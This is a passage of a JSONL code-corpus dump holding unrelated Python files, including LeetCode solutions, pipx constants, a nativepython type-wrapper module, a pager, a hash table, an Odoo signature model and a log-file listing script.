m\r\n else:\r\n l = m + 1\r\n return num[l + 1] if l + 1 < n else num[0]\r\n\r\ndef run():\r\n sol = Solution()\r\n ret = sol.findMin([4,5,6,7,0,1,2])\r\n assert ret == 0\r\n\r\n ret = sol.findMin([0])\r\n assert ret == 0\r\n\r\n ret = sol.findMin([1,2])\r\n assert ret == 1\r\n\r\n ret = sol.findMin([2,3,4,5,1])\r\n assert ret == 1\r\n","sub_path":"153-find-minimum-in-rotated-sorted-array.py","file_name":"153-find-minimum-in-rotated-sorted-array.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"357958306","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def getIntersectionNode(self, headA, headB):\n \"\"\"\n :type head1, head1: ListNode\n :rtype: ListNode\n \"\"\"\n \n\n aCount = 0\n bCount = 0\n \n temp = headA\n while temp != None:\n aCount += 1\n temp = temp.next\n\n temp = headB\n while temp != None:\n bCount += 1\n temp = temp.next\n\n if aCount == 0 or bCount ==0:\n return None\n \n diff = abs(aCount - bCount)\n\n if headA.val == headB.val:\n return headB\n\n if aCount > bCount:\n for _ in range(diff):\n headA = headA.next\n elif aCount < bCount:\n for _ in range(diff):\n headB = headB.next\n\n while headA != None or headB != None:\n if headA.val == headB.val:\n return headA\n headA = headA.next\n headB = headB.next\n\n return None\n\n\n# a1<--a2\n# +\n# \\ last\n# c1<--c2<--c3\n# +\n# /\n# b1-->b2-->b3\n\n ","sub_path":"intersection-of-two-linked-lists.py","file_name":"intersection-of-two-linked-lists.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"612772717","text":"import os\nimport sys\nfrom pathlib import Path\nfrom textwrap import dedent\n\nDEFAULT_PYTHON = sys.executable\nDEFAULT_PIPX_HOME = Path.home() / \".local/pipx\"\nDEFAULT_PIPX_BIN_DIR = Path.home() / \".local/bin\"\nPIPX_HOME = Path(os.environ.get(\"PIPX_HOME\", DEFAULT_PIPX_HOME)).resolve()\nPIPX_LOCAL_VENVS = PIPX_HOME / \"venvs\"\nLOCAL_BIN_DIR = Path(os.environ.get(\"PIPX_BIN_DIR\", DEFAULT_PIPX_BIN_DIR)).resolve()\nPIPX_VENV_CACHEDIR = PIPX_HOME / \".cache\"\nPIPX_PACKAGE_NAME = \"pipx\"\nTEMP_VENV_EXPIRATION_THRESHOLD_DAYS = 14\n\ncompletion_instructions = dedent(\n \"\"\"\nAdd the appropriate command to your shell's config file\nso that it is run on startup. You will likely have to restart\nor re-login for the autocompletion to start working.\n\nbash:\n eval \"$(register-python-argcomplete pipx)\"\n\nzsh:\n To activate completions for zsh you need to have\n bashcompinit enabled in zsh:\n\n autoload -U bashcompinit\n bashcompinit\n\n Afterwards you can enable completion for pipx:\n\n eval \"$(register-python-argcomplete pipx)\"\n\ntcsh:\n eval `register-python-argcomplete --shell tcsh pipx`\n\nfish:\n register-python-argcomplete --shell fish pipx | .\n\n\"\"\"\n)\n","sub_path":"pipx/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"541663737","text":"from nativepython.typed_expression import TypedExpression\nimport nativepython.native_ast as native_ast\nfrom nativepython.type_wrappers.wrapper import Wrapper\nfrom nativepython.type_wrappers.none_wrapper import NoneWrapper\nfrom nativepython.type_wrappers.python_type_wrappers import PythonTypeObjectWrapper\nfrom nativepython.type_wrappers.python_free_function_wrapper import PythonFreeFunctionWrapper\nfrom nativepython.type_wrappers.python_typed_function_wrapper import PythonTypedFunctionWrapper\nfrom nativepython.type_wrappers.tuple_of_wrapper import TupleOfWrapper\nfrom nativepython.type_wrappers.list_of_wrapper import ListOfWrapper\nfrom nativepython.type_wrappers.one_of_wrapper import OneOfWrapper\nfrom nativepython.type_wrappers.class_wrapper import ClassWrapper\nfrom nativepython.type_wrappers.const_dict_wrapper import ConstDictWrapper\nfrom nativepython.type_wrappers.tuple_wrapper import TupleWrapper, NamedTupleWrapper\nfrom nativepython.type_wrappers.alternative_wrapper import makeAlternativeWrapper\nfrom nativepython.type_wrappers.bound_method_wrapper import BoundMethodWrapper\nfrom nativepython.type_wrappers.len_wrapper import LenWrapper\nfrom nativepython.type_wrappers.arithmetic_wrapper import Int64Wrapper, Float64Wrapper, BoolWrapper\nfrom nativepython.type_wrappers.string_wrapper import StringWrapper\nfrom nativepython.type_wrappers.bytes_wrapper import BytesWrapper\nfrom nativepython.type_wrappers.python_object_of_type_wrapper import PythonObjectOfTypeWrapper\nfrom typed_python._types import TypeFor\nfrom typed_python import *\n\n_type_to_type_wrapper_cache = {}\n\ndef typedPythonTypeToTypeWrapper(t):\n if t not in _type_to_type_wrapper_cache:\n _type_to_type_wrapper_cache[t] = _typedPythonTypeToTypeWrapper(t)\n return _type_to_type_wrapper_cache[t]\n\ndef _typedPythonTypeToTypeWrapper(t):\n if isinstance(t, Wrapper):\n return t\n\n if not hasattr(t, '__typed_python_category__'):\n t = TypeFor(t)\n assert hasattr(t, '__typed_python_category__'), t\n\n if t is Int64():\n return Int64Wrapper()\n\n if t is Float64():\n return Float64Wrapper()\n\n if t is Bool():\n return BoolWrapper()\n\n if t is NoneType():\n return NoneWrapper()\n\n if t is String():\n return StringWrapper()\n\n if t is Bytes():\n return BytesWrapper()\n\n if t.__typed_python_category__ == \"Class\":\n return ClassWrapper(t)\n\n if t.__typed_python_category__ == \"Alternative\":\n return makeAlternativeWrapper(t)\n\n if t.__typed_python_category__ == \"ConstDict\":\n return ConstDictWrapper(t)\n\n if t.__typed_python_category__ == \"ConcreteAlternative\":\n return makeAlternativeWrapper(t)\n\n if t.__typed_python_category__ == \"NamedTuple\":\n return NamedTupleWrapper(t)\n\n if t.__typed_python_category__ == \"Tuple\":\n return TupleWrapper(t)\n\n if t.__typed_python_category__ == \"ListOf\":\n return ListOfWrapper(t)\n\n if t.__typed_python_category__ == \"Function\":\n return PythonTypedFunctionWrapper(t)\n\n if t.__typed_python_category__ == \"BoundMethod\":\n return BoundMethodWrapper(t)\n\n if t.__typed_python_category__ == \"TupleOf\":\n return TupleOfWrapper(t)\n\n if t.__typed_python_category__ == \"OneOf\":\n return OneOfWrapper(t)\n\n if t.__typed_python_category__ == \"PythonObjectOfType\":\n return PythonObjectOfTypeWrapper(t)\n\n assert False, t\n\ndef pythonObjectRepresentation(context, f):\n if f is len:\n return TypedExpression(context, native_ast.nullExpr, LenWrapper(), False)\n\n if f is None:\n return TypedExpression(\n context,\n native_ast.Expression.Constant(\n val=native_ast.Constant.Void()\n ),\n NoneWrapper(),\n False\n )\n if isinstance(f, bool):\n return TypedExpression(\n context,\n native_ast.Expression.Constant(\n val=native_ast.Constant.Int(val=f,bits=1,signed=False)\n ),\n BoolWrapper(),\n False\n )\n if isinstance(f, int):\n return TypedExpression(\n context,\n native_ast.Expression.Constant(\n val=native_ast.Constant.Int(val=f,bits=64,signed=True)\n ),\n Int64Wrapper(),\n False\n )\n if isinstance(f, float):\n return TypedExpression(\n context,\n native_ast.Expression.Constant(\n val=native_ast.Constant.Float(val=f,bits=64)\n ),\n Float64Wrapper(),\n False\n )\n if isinstance(f, str):\n return StringWrapper().constant(context, f)\n if isinstance(f, bytes):\n return BytesWrapper().constant(context, f)\n\n if isinstance(f, type(pythonObjectRepresentation)):\n return TypedExpression(\n context,\n native_ast.nullExpr,\n PythonFreeFunctionWrapper(f),\n False\n )\n\n if hasattr(f, '__typed_python_category__'):\n if f.__typed_python_category__ == \"Function\":\n return TypedExpression(\n context,\n native_ast.nullExpr,\n PythonTypedFunctionWrapper(f),\n False\n )\n\n if isinstance(f, type):\n return TypedExpression(context, native_ast.nullExpr, PythonTypeObjectWrapper(f), False)\n\n assert False, f\n","sub_path":"nativepython/python_object_representation.py","file_name":"python_object_representation.py","file_ext":"py","file_size_in_byte":5419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"217147105","text":"\"\"\"\nMingyang Xue, Coco Cheng\nCSE 163 AG, AF\n\nThis file cleans up the data that is going to be\nused for q1 by filtering old data and missing values\n\"\"\"\n\n\nimport pandas as pd\n\n\ndef cleanData(data):\n \"\"\"\n Takes in the dataset data1\n Filters old data and missing values\n and sorts by time\n Returns the cleaned dataframe\n \"\"\"\n dt = data.dropna(subset=['Year', 'Avg hrs per day sleeping', 'Age Group'])\n min_y = data['Year'] >= 2004\n max_y = data['Year'] <= 2016\n dt = data[min_y & max_y]\n dt = dt.sort_values('Year')\n return dt\n\n\ndef main():\n data = pd.read_excel('/home/data1.xlsx')\n cleanData(data)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Insomnia and its impact/q1CleanData.py","file_name":"q1CleanData.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"142776811","text":"\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nsns.set(color_codes=True)\ncd = ['Clinton', 'Trump', 'Sanders', 'Cruz']\n\nax = sns.barplot(cd, [9, 77, 6, 15])\nax.set(ylabel='count')\nplt.show()","sub_path":"Cap18-Extras/44_seaborn.py","file_name":"44_seaborn.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"553202716","text":"class Student:\n def __init__(self,name,age,scores):\n self.name=name\n self.age=age\n # self.yu=scores[0]\n # self.shu=scores[1]\n # self.ying=scores[2]\n self.max=max(scores)\n self.max_course=[]\n for i in range(len(scores)):\n if self.max==scores[i]:\n if i==0:\n self.max_course.append('语文')\n elif i==1:\n self.max_course.append('数学')\n else:\n self.max_course.append('英语')\n def get_name(self):\n return self.name\n def get_age(self):\n return self.age\n def get_course(self):\n return self.max\nxiaoming=Student('小明',20,[90,100,100])\nname=xiaoming.get_name()\nprint('学生的姓名为:{}'.format(name))\nage=xiaoming.get_age()\nprint('{}的年龄为:{}岁'.format(name,age))\ncourse=xiaoming.get_course()\nprint('最高的成绩为:',end='')\nfor i in xiaoming.max_course:\n print(i,end=':')\n print('{}'.format(course),end=' ')\nprint()\n\n\n","sub_path":"python作业实战67-71/源码/69.py","file_name":"69.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"276541402","text":"import os\n\nclass Page:\n file_data = None\n first_value = 0\n last_value = 0\n\n def __init__(self, file_data):\n self.file_data = file_data\n self.file_data.tab_sizes = self.calculate_tabsize(file_data)\n\n def show_page(self, first_value, last_value):\n titles = self.file_data.titles\n tab_sizes = self.file_data.tab_sizes\n data_list = self.file_data.data_list\n\n self.first_value = first_value\n self.last_value = last_value\n \n title_string = \"\\n \"\n for key in titles:\n title_string += key.ljust(tab_sizes[key])\n print(title_string)\n\n for i in range(self.first_value, self.last_value):\n if i >= len(data_list):\n break\n \n values_string = \" \"\n row = data_list[i]\n for key in row:\n values_string += row[key].ljust(tab_sizes[key])\n print(values_string)\n help_str = \"\\n ←: first page ↑: previous page ↓: next page →: last page \\n\" + \\\n \"\\n pageDown: previous entry pageUp: next entry esc: exit\"\n print(help_str)\n\n def create_page(self, current_page):\n num_of_pages = self.file_data.num_of_pages\n page_size = self.file_data.page_size\n\n if current_page < 1:\n current_page = 1\n elif current_page > num_of_pages:\n current_page = num_of_pages\n \n first_value = (page_size * current_page) - page_size\n last_value = page_size * current_page\n\n os.system(\"cls\")\n print(\"\\n Page: \", current_page,\"/\", num_of_pages, \"\\n Pagesize: \", page_size)\n\n self.show_page(first_value, last_value)\n\n return current_page\n\n def calculate_tabsize(self, file_data):\n tabsize_dict = {}\n\n for title in file_data.titles:\n tabsize_dict[title] = 0\n for row in file_data.data_list:\n if len(row[title]) > int(tabsize_dict[title]):\n tabsize_dict[title] = len(row[title])\n tabsize_dict[title] += 5\n return tabsize_dict\n","sub_path":"Exercise 1/TextViewer/pageviewer.py","file_name":"pageviewer.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"382241499","text":"# -*- coding: utf-8 -*-\n# Author: XuMing \n# Brief: \nfrom domain.pos import POS_WEIGHT\n\n\ndef word_pos_similarity(l1, l2, similarity_type='word', pos_weight=None, embedding=None):\n \"\"\"\n get similarity score by text vector and pos vector\n :param l1: input sentence list\n :param l2: sentence list which to be compared\n :param similarity_type:\n :param pos_weight:\n :param embedding:\n :return:\n \"\"\"\n if not l1 or not l2:\n return 0\n pos_weight = pos_weight or POS_WEIGHT\n if similarity_type == 'word':\n # simple word name overlapping coefficient\n return len(set(l1) & set(l2)) / len(set(l2))\n elif similarity_type == 'word_pos':\n # word and pos overlapping coefficient\n sim_weight = 0\n for word, pos in set(l1):\n sim_weight += pos_weight.get(pos, 1) if word in l2 else 0\n total_weight = sum(pos_weight.get(pos, 1) for _, pos in set(l1))\n return sim_weight / total_weight if total_weight > 0 else 0\n elif similarity_type == 'vector' and embedding:\n # word vector and pos weight\n sim_weight = 0\n total_weight = 0\n for word, pos in l1:\n if word not in embedding.index2word:\n continue\n cur_weight = pos_weight.get(pos, 1)\n max_word_sim = max([embedding.similarity(word_l2, word) for word_l2 in l2])\n sim_weight += cur_weight * max_word_sim\n total_weight += cur_weight\n return sim_weight / total_weight if total_weight > 0 else 0\n return 0\n\n\nif __name__ == '__main__':\n print(word_pos_similarity([1, 2], [3, 2]))\n","sub_path":"domain/similarity.py","file_name":"similarity.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"541498425","text":"import numpy as np\nimport rospy\nimport scipy.io as sio\nfrom promp.copromp import CoProMP\nfrom promp.utils.utils import linear_phase\nfrom promp.utils.utils import normalized_gaussian_basis\n\nfrom robot_serving.srv import *\nfrom Baxter_Movement_Aux.baxter_connection import BaxterConnection, GoalStatus, baxter_interface\nfrom Baxter_Movement_Aux.trajectory_executor import TrajectoryExecutor\nfrom std_msgs.msg import Int32\n\n\nclass LegibleTrajectoryServer(object):\n\n\tdef __init__(self):\n\n\t\tself._service_server = rospy.Service(\"movement_decision_legible\", Movement, self.legible_traj_srv_handler)\n\t\tself._Y = []\n\t\tself._O = []\n\t\tself.load_trajs()\n\n\t\t\"\"\"\n\t\trospy.loginfo(\"Creating COPMP\")\n\t\tself._copmp = CoProMP(self._O, self._Y, 3, 7, o_dt=1, dt=0.001, Sigma_y=None)\n\t\tself._copmp.build(linear_phase, lambda z, dt: normalized_gaussian_basis(2, z, dt),\n\t\t\t\t\t\t linear_phase, lambda z, dt: normalized_gaussian_basis(10, z, dt))\n\t\trospy.loginfo(\"COPMP created\")\n\t\t\"\"\"\n\n\t\tself._baxter_connect = BaxterConnection()\n\n\t\tself._log_file = open('log_trajectory.txt', 'w')\n\t\trospy.on_shutdown(self._log_file.close)\n\t\tself._can_start = False\n\n\t\tself._start_sginal = rospy.Subscriber('/start', Int32, self.start_handler)\n\n\t\twhile not self._can_start:\n\t\t\tpass\n\n\t\tself._start_sginal.unregister()\n\t\tself.send_neutral()\n\n\t\trospy.loginfo(\"Legible trajectory service server created\")\n\n\tdef send_neutral(self):\n\t\tstarting_position = {\n\t\t\t'left': {\n\t\t\t\t'left_s0': 0.5721748332275391,\n\t\t\t\t'left_s1': 0.2784175126831055,\n\t\t\t\t'left_w0': 0.13038836682128907,\n\t\t\t\t'left_w1': 0.730558349395752,\n\t\t\t\t'left_w2': -1.0507768385009766,\n\t\t\t\t'left_e0': -1.047708876928711,\n\t\t\t\t'left_e1': 2.012199296209717\n\t\t\t},\n\t\t\t'right': {\n\t\t\t\t'right_s0': -0.4460049135681153,\n\t\t\t\t'right_s1': 0.03873301484985352,\n\t\t\t\t'right_w0': -0.18292720874633792,\n\t\t\t\t'right_w1': 0.6446554253723145,\n\t\t\t\t'right_w2': -1.5370487477050783,\n\t\t\t\t'right_e0': 1.5604419546936037,\n\t\t\t\t'right_e1': 2.1698158219848636\n\t\t\t}\n\t\t}\n\n\t\tleft = baxter_interface.Limb('left')\n\t\tright = baxter_interface.Limb('right')\n\n\t\tleft.move_to_joint_positions(starting_position['left'])\n\t\tright.move_to_joint_positions(starting_position['right'])\n\n\tdef start_handler(self, msg):\n\t\trospy.loginfo(\"Handler\")\n\t\tif msg.data == 1:\n\t\t\tself._can_start = True\n\n\tdef load_trajs(self):\n\t\tN = 20\n\t\tlegible_trajs = []\n\t\tlegible_targets = []\n\t\tfor i in range(1, N + 1):\n\t\t\tprint('clean_trajectories/legible_traj%d.mat' % i)\n\t\t\tlegible_trajs.append(\n\t\t\t\t\tsio.loadmat('./trajectory_recording/clean_trajectories/legible_traj%d.mat' % i)['traj'][:, 1:7 + 1])\n\t\t\tlegible_targets.append(\n\t\t\t\t\tsio.loadmat('./trajectory_recording/clean_trajectories/legible_traj%d.mat' % i)['target'])\n\n\t\tself._Y = np.hstack(legible_trajs)\n\t\tself._O = np.hstack(legible_targets)\n\n\tdef legible_traj_srv_handler(self, req):\n\t\tresult = 1\n\t\ttarget = [req.x_pos, req.y_pos, req.z_pos]\n\t\tnew_o = np.vstack(target)\n\n\t\trospy.loginfo(\"Creating COPMP\")\n\t\tcopmp = CoProMP(self._O, self._Y, 3, 7, o_dt=1, dt=0.0001, Sigma_y=None)\n\t\tcopmp.build(linear_phase, lambda z, dt: normalized_gaussian_basis(2, z, dt),\n\t\t\t\t\tlinear_phase, lambda z, dt: normalized_gaussian_basis(10, z, dt))\n\t\trospy.loginfo(\"COPMP created\")\n\n\t\trospy.loginfo(\"Conditioning COPMP to target\")\n\t\tcopmp.condition(new_o, 1)\n\t\tymp = copmp.most_probable()\n\n\t\ttime = ymp[:, 0][:, np.newaxis]\n\t\tright_traj = ymp[:, 1:7 + 1]\n\n\t\trospy.loginfo(\"Executing legible trajectory\")\n\t\tte = TrajectoryExecutor(time, 10, None, right_traj)\n\t\tte.execute()\n\n\t\trospy.loginfo(\"Legible trajectory executed\")\n\n\t\treturn MovementResponse(result)\n","sub_path":"robot_serving/src/Movement/Baxter_Movement_Aux/legible_traj_service.py","file_name":"legible_traj_service.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"224888042","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nfrom scrapy.exceptions import DropItem\nfrom .items import *\nimport os\n\ncheckFile = 'isRunning.txt'\n\n\nclass StatusPipeline(object):\n def open_spider(self, spider):\n if spider.name == 'tianya':\n f = open(checkFile, 'w') # 创建文件代表爬虫正在执行\n f.close()\n\n def close_spider(self, spider):\n isFileExist = os.path.isfile(checkFile) # 结束删除标识文件\n if isFileExist:\n os.remove(checkFile)\n\n\nclass LinksItemPipeline(object):\n def process_item(self, item, spider):\n if isinstance(item, LinksItem):\n try:\n item.save()\n except:\n raise DropItem('Links Duplicate') # 回复帖子在上次的页面上回复的 会在抓取到这个页面,链接不存\n return item\n\n\nclass StoryItemPipeline(object):\n def process_item(self, item, spider):\n # 帖子的作者 若此是空字符串说明是问答贴,drop\n if isinstance(item, StoryItem):\n if item[\"story_author\"] == \"\":\n raise DropItem('Useless item found!')\n elif item[\"story_content\"] == \"Useless\":\n raise DropItem('Useless item found!')\n try:\n item.save()\n except:\n raise DropItem('save failed')\n return item\n","sub_path":"scrapy_django_tianya_new/tianya/bots/tianya_spider/tianya_spider/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"194005244","text":"#!-*-coding:utf-8-*-\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef sigmoid( x ):\n return 1 / ( 1 + np.exp( -x ) )\n\ndef sigmoid_prime( x ):\n y = sigmoid( x )\n return y * ( 1 - y )\n\nx = np.arange( -5 , 5 , 0.1 )\nplt.grid()\nplt.plot( x , sigmoid( x ) )\nplt.plot( x , sigmoid_prime( x ) , marker=\"o\" , markevery = 5 )\nplt.savefig( \"./graphs/sigmoid.png\" )\n","sub_path":"02/sigmoid.py","file_name":"sigmoid.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"239814739","text":"from HashItem import HashItem\r\n\r\nclass HashTable:\r\n def __init__(self):\r\n self.size = 256\r\n self.slots = [None for i in range(self.size)]\r\n self.count = 0\r\n\r\n def _hash(self,key):\r\n mult =1\r\n hv =0\r\n for ch in key:\r\n hv+=mult*ord(ch)\r\n mult+=1\r\n return hv%self.size\r\n\r\n def put(self,key,value):\r\n item = HashItem(key,value)\r\n h = self._hash(key)\r\n\r\n while self.slots[h]:\r\n if self.slots[h].key is key:\r\n break\r\n h =(h+1)%self.size\r\n if self.slots[h] is None:\r\n self.count+=1\r\n self.slots[h]= item\r\n\r\n def get(self,key):\r\n h= self._hash(key)\r\n while self.slots[h]:\r\n if self.slots[h].key is key:\r\n return self.slots[h].value\r\n h = (h+1)%self.size\r\n return None\r\n\r\n def __getitem__(self,key):\r\n return self.get(key)\r\n","sub_path":"HashTable/HashTable.py","file_name":"HashTable.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"255078270","text":"#\n# Copyright 2017 NephoScale\n#\n\n\nfrom django.conf.urls import url\nfrom astutedashboard.dashboards.billing.image_report import views\n\nurlpatterns = [\n\n url(r'^$', views.IndexView.as_view(), name='index'),\n url(r'^search_filter$', views.search_filter, name='search_filter'),\n url(r'^export_as_csv$', views.export_as_csv, name='export_as_csv'),\n]\n\n","sub_path":"astute-dashboard/astutedashboard/dashboards/billing/image_report/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"94040258","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nfrom openerp import models, fields, api, _\nfrom openerp.exceptions import ValidationError\n\nclass res_users_signature(models.Model):\n _name = \"res.users.signature\"\n _description = 'User Signature' \n _order = 'company_id, id'\n \n company_id = fields.Many2one('res.company', string=\"Company\")\n signature = fields.Html(string=\"Signature\")\n user_id = fields.Many2one('res.users', string=\"User\")\n \n @api.one\n @api.constrains('company_id','user_id')\n def _check_unicity(self):\n lst = self.search([('id','!=',self.id),('company_id','=',self.company_id.id),('user_id','=',self.user_id.id)])\n if lst:\n raise ValidationError(_(\"The user already has a signature for this company\")) \n\n\nclass res_users(models.Model):\n _inherit = \"res.users\"\n\n @api.onchange('company_id')\n def onchange_company_id(self):\n if self.signature_ids:\n \n for signature_id in self.signature_ids:\n if signature_id.company_id.id == self.company_id.id:\n self.signature = signature_id.signature\n break\n\n signature_ids = fields.One2many('res.users.signature', 'user_id', string=\"User Signatures\")\n ","sub_path":"users_multi_signature/models/res_users.py","file_name":"res_users.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"512268440","text":"class Solution:\n def plusOne(self, digits):\n \"\"\"\n :type digits: List[int]\n :rtype: List[int]\n \"\"\"\n\n cur = len(digits) - 1\n carry = 1\n while cur >= 0:\n tmp = digits[cur] + carry\n if tmp < 10:\n digits[cur] = tmp\n carry = 0\n else:\n digits[cur] = tmp - 10\n carry = 1\n cur -= 1\n\n if cur < 0 and carry == 1:\n digits.insert(0, carry)\n \n return digits\n\nif __name__ == '__main__':\n digits = [9, 9, 9]\n print(Solution().plusOne(digits))\n","sub_path":"leetcode/python/66_PlusOne.py","file_name":"66_PlusOne.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"549593716","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\ndef fiboword(a,b,n):\n lena = len(a)\n lenb = len(b)\n digits = [lena, lenb]\n digit_range = True\n while digit_range:\n digits.append(digits[-1] + digits[-2])\n if digits[-1] >= n:\n digit_range = False\n\n while len(digits) > 3:\n if n <= digits[-3]:\n digits.pop()\n digits.pop()\n else:\n n = n-digits[-3]\n digits.pop() \n\n if len(digits) == 3:\n if n <= digits[-3]:\n return(a[n-1])\n else:\n n = n-digits[-3]\n return(b[n-1])\n else:\n return(b[n-1])\n\niters = int(input())\n\nfor iterate in range(iters):\n a,b,n = input().strip().split(' ')\n n = int(n)\n answer = fiboword(a,b,n)\n print(answer)\n","sub_path":"230.py","file_name":"230.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"113740005","text":"#!/usr/bin/env python3\nimport sys\nimport time\nimport os\n\ndir_exists = lambda directory: True if os.path.exists(directory) else False\n\n\ndef harvester(directory):\n \"\"\"\n\treturn all logs file on directory\n\t\"\"\"\n logs = list()\n try:\n for item in os.walk(directory):\n dirpath, dirnames, filenames = item\n\n # check every filenames in dirpath\n for file in filenames:\n root, ext = os.path.splitext(file)\n\n if ext == \".log\":\n logs.append(os.path.join(dirpath, file))\n except KeyboardInterrupt:\n print(\"[*] Aborting ...\")\n time.sleep(1)\n return logs\n return logs\n\n\ndef usage():\n print(\" Logs files Harvester : logs_harvester.py\")\n\n print(\"\\n usage : sudo python3 logs_harvester.py dir1 dir2 dir3 ...\\n\")\n exit()\n\n\ndef main(dirs):\n\n directories = list()\n logs = list()\n\n # check if all directories exists\n for directory in dirs:\n if not dir_exists(directory):\n print(\"[-] {} Not Found.(Exluded)\".format(directory))\n else:\n directories.append(directory)\n\n if not len(directories):\n print(\"[-] No directory Exists. Aborting ...\")\n exit()\n\n # walk through directories\n for directory in directories:\n print(\"[*] Processing {} ...\".format(directory))\n logs += harvester(directory)\n time.sleep(1)\n\n # display logs\n print(\"[+] Found {} log file\".format(len(logs)))\n time.sleep(1)\n for log in logs:\n print(\"[+] {}\".format(log))\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) <= 1:\n usage()\n\n main(sys.argv[1:])\n","sub_path":"python/logs_harvester.py","file_name":"logs_harvester.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"188768839","text":"#-*- coding: UTF-8 -*-\nimport json\nimport os\nimport sys\n__root_dir = os.path.abspath(os.path.dirname(__file__))\n__root_dir = os.path.abspath(os.path.join(__root_dir, '..'))\nos.environ['ET_INSTALLED_DIR'] = __root_dir\nsys.path.insert(0, __root_dir)\negg_path = os.path.join(__root_dir, 'utlis')\nsys.path.insert(0, egg_path)\nsys.path.insert(0, \"D:\\project\\python\\interfaceTest\\Lib\\site-packages\")\nimport ddt\nimport unittest\n\nfrom utlis.read_res.ReadExec import Read_exec\nfrom utlis.read_res.ReadIni import read_ini\nfrom utlis.read_res.GetKeyValue import GetKeyValue\nfrom utlis.handle_results import handle_results\nfrom utlis.handlle_json import handle_json\nfrom utlis.handle_cookie import handle_cookie\nfrom common.BaseRequest import base_request\n\n\n\n\ndata = Read_exec(file_name=\"聚合\").get_all_lines()\nimooc_host = read_ini.get_content(\"server\",\"juhe_host\")\n\n@ddt.ddt\nclass TestImooc(unittest.TestCase):\n\n\n @ddt.data(*data)\n def test_sugrec(self,data):\n cookie=None\n get_cookie=None\n headers=None\n test_id,environment,role,is_perform,condition,url,method,data_json,cookie_perform,header_perform,check_field,check_value=data\n if is_perform==\"yes\":\n if cookie_perform == \"yes\":\n cookie = handle_cookie.get_cookie_value(environment)\n elif cookie_perform== \"write\":\n get_cookie = {\"is_cookie\":environment}\n if header_perform==\"yes\":\n headers = handle_json.get_data_value(\"config/header.json\",environment)\n res =base_request.send_request(method,imooc_host+url,json.loads(data_json),cookie=cookie,get_cookie=get_cookie,header=headers)\n\n print(\"res=============>\",res)\n cf_list = handle_results.get_ec_field(check_field)\n cv_list = handle_results.get_ec_field(check_value)\n for i in range(len(cf_list)):\n if cf_list[i]=='json':\n load_data = handle_json.read_json(\"config/user_data.json\").get(url)\n json_check_results= handle_json.check_json_format(load_data,json.loads(res))\n self.assertTrue(json_check_results)\n else:\n data_list = GetKeyValue(res).search_key(cf_list[i])\n self.assertTrue(data_list !=[] and data_list!=None,\"字段{0}不存在json中\".format(cf_list[i]))\n for h_data in data_list:\n\n print(cv_list[i])\n print(str(h_data))\n self.assertEqual(str(h_data), cv_list[i])\n\n\n\n\nif __name__ == '__main__':\n\n\n unittest.main()\n","sub_path":"code/case/juhe_test.py","file_name":"juhe_test.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"468634894","text":"from PIL import Image\nimport numpy as 